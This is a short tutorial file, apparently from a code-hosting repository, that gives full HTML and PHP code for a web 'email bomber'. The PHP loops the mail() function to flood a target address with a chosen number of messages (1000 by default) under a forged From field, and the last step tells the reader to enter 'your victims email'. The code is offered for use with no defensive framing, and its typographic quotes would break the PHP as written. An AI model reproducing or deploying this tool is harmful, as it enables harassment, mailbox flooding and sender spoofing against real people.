-
Notifications
You must be signed in to change notification settings - Fork 2
/
rtrtt.txt
71 lines (59 loc) · 2.12 KB
/
rtrtt.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
You’ll Need:
1 Webhosting – Make Sure You Have SMTP Or It Wont Work
Small Knowledge About PHP And HTML
Steps:
1. So first we will want to create a file called “index.html”
2. We will place the following code in the index.html
Code:
<html>
<head>
<title>Email Bomber</title>
</head>
<body>
<center>
<h1 style=”color:white;font-shadow:0px 0px 2px blue;”>Simple Email Bomber</h1><br>
<!–This is where the forms starts–>
<form action=”email.php” method=”post”><br>
Email: <input type=”text” name=”email” /><br>
Amount to send : <input type=”text” name=”spam” /><br>
Subject: <input type=”text” name=”subject” /><br>
Message: <TEXTAREA NAME=”message” ROWS=6 COLS=40></TEXTAREA><br>
From: <input type=”text” name=”from” /><br>
<input type=”submit” value=”send” /><input type=”reset” />
</form>
</center>
</body>
</html>
3. Go ahead and save that file in a folder, name the folder what-ever you want.
4. Now in that folder go ahead and create a file named “email.php”
5. Now open the email.php and place the following code inside it.
Code:
<?php
$num = 1;
$email = $_POST[’email’];
$spam = $_POST[‘spam’];
$subject = $_POST[‘subject’];
$message = $_POST[‘message’];
$from = $_POST[‘from’];
$send = $_POST[‘send’];
if($spam==’ ‘)
{
$spam = 1000; // this is for if the Amount to send = nothing then it will send 1000 emails
// you can change it too what-ever you want.
}
if($spam!=” && $email==”)
{
die(‘Please enter an email!.’);
}
if($email != ”)
{
while($num<=$spam)
{
mail ($email, $subject, $message, “From: ” . $from);
echo $num . “<br>”;
$num++;
}
}
?>
6. Now you can go ahead and upload it to your server, and boom.
Now you should be able to go to your domain/url and find that theres a panel there, go ahead and fill it out with your victims email & the message to send/spam and press the send button.